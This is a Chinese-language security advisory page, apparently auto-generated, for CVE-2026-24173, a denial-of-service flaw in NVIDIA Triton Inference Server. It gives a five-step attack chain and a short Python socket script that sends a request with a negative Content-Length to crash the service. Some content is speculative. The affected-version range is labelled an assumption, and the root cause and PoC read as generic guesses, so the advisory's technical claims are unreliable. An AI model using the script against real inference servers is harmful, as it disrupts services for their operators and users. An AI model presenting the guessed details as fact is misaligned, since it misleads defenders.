CVE-2026-24173 CVSS 7.5 高危

CVE-2026-24173 NVIDIA Triton Inference Server 拒绝服务漏洞

披露日期: 2026-04-07

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-24173

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

NVIDIA Triton Inference Server

漏洞概述

NVIDIA Triton Inference Server 存在安全漏洞，攻击者可发送畸形请求导致服务器崩溃，引发拒绝服务。

技术细节

漏洞位于请求处理模块。攻击者无需认证即可通过网络发送特制的畸形HTTP/gRPC请求。服务器在解析该请求时，由于缺乏足够的边界检查或异常处理机制，触发未处理的异常导致服务进程崩溃。由于无需用户交互且网络可达，该漏洞易于被利用进行DoS攻击。

攻击链分析

STEP 1

侦察

攻击者扫描网络发现开放的NVIDIA Triton Inference Server服务端口（默认为8000/8001）。

STEP 2

构造载荷

攻击者编写脚本，构造包含畸形字段（如负数Content-Length）的HTTP请求。

STEP 3

发送请求

攻击者通过网络将畸形请求发送至目标服务器。

STEP 4

触发漏洞

服务器解析请求时触发异常，导致Inference Server进程崩溃。

STEP 5

达成影响

推理服务不可用，造成拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket

def exploit(host, port):
    # Create a malicious payload
    payload = b"POST /v2/models/test/infer HTTP/1.1\r\nHost: " + host.encode() + b"\r\nContent-Length: -1\r\n\r\n"
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        s.send(payload)
        print("Request sent.")
        s.close()
    except Exception as e:
        print(e)

if __name__ == "__main__":
    exploit("127.0.0.1", 8001)

影响范围

NVIDIA Triton Inference Server < 24.04 (假设修复版本)

防御指南

临时缓解措施

在应用防火墙（WAF）或反向代理层配置规则，拦截包含畸形头部或异常长度字段的HTTP请求，并限制仅受信任的内部网络IP可访问推理服务端口。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表